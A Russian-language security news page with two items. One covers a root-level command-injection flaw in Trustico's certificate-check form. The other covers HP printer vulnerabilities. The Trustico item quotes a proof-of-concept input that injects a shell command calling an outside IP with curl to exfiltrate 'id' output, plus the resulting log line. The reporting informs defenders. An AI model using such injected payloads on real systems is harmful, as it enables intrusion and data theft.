Все сертификаты Trustico отзовут из-за полной компрометации сервера

Все сертификаты Trustico отзовут из-за полной компрометации сервера

Ранее освещенная история с проблемными сертификатами, полученными через реселлера Trustico, усугубилась новыми подробностями. В веб-интерфейсе сервиса была обнаружена уязвимость, позволяющая получить к серверу root-доступ.

Если раньше эксперты только гадали, что может быть причиной того, что Trustico решила отозвать выданные сертификаты, то сейчас ситуация начинает проясняться. Похоже, что такое решение связано с киберинцидентом, подорвавшим безопасность реселлера.

Сама брешь имеет довольно посредственный характер — допускается ввод без экранирования спецсимволов. Таким образом, если кто-либо введет в форме проверки сертификата шелл-операторы, они будут исполнены на серверы с правами root.

Об этой проблеме сообщили эксперты Manawyrm и Predrag Cujanović в Twitter.

В качестве примера специалисты приводят ввод следующую строку:

$(curl https://3.5.6.9/`id`)

Которая отправит на хост запрос:

3.5.6.9 - [01/Mar/2018:09:52:14 -0500] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

Сообщается, что на данный момент сайт Trustico недоступен. Специалистам пока не удалось выяснить, позволяет ли данная брешь скомпрометировать приватные ключи сертификатов, однако одному из исследователей удалось найти в конфигурации секретный ключ для SSL-сертификта домена «*.trustico.com».

Следовательно, в ближайшее время DigiCert и Comodo отреагируют на инцидент, что, скорее всего, приведет к отзыву всех выданных через Trustico сертификатов.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

HP пропатчила червеобразную уязвимость, затрагивающую более 150 МФУ

Компания Hewlett Packard (HP) выпустила обновления, в которых разработчики устранили уязвимость, затрагивающую более 150 моделей многофункциональных устройств (МФУ). Брешь опасна тем, что позволяет создать червеобразный эксплойт и перемещаться по другим уязвимым принтерам внутри сети.

Проблему, получившую идентификатор CVE-2021-39238, обнаружили эксперты F-Secure Александр Большев и Тимо Хирвонен. В настоящее время соответствующий патч доступен на официальном сайте HP.

По словам специалистов, уязвимость представляет собой возможность переполнения буфера в парсере шрифтов. Потенциальный злоумышленник может использовать этот баг для получения контроля над прошивкой устройств, кражи данных или создания ботнета из уязвимых МФУ.

Эксперты F-Secure также подчеркнули, что эксплуатация CVE-2021-39238 практически не оставляет следов, что затруднит расследование подобного киберинцидента в организации. Использовать брешь можно как с помощью вредоносных сайтов, так и прямой атакой на устройства из Сети.

 

Кроме того, условный атакующий может загрузить вредоносный код с помощью USB-накопителя, который подключается к принтерам HP, или отправить фишинговую рассылку с вредоносным PDF-документом, который запустит эксплойт.

Большев и Хирвонен также указали и на другую уязвимость — CVE-2021-39237. К счастью, этот баг можно использовать только при наличии физического доступа к МФУ. На данный момент, как отметили специалисты F-Secure, реальной эксплуатации брешей в атаках зафиксировано не было.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru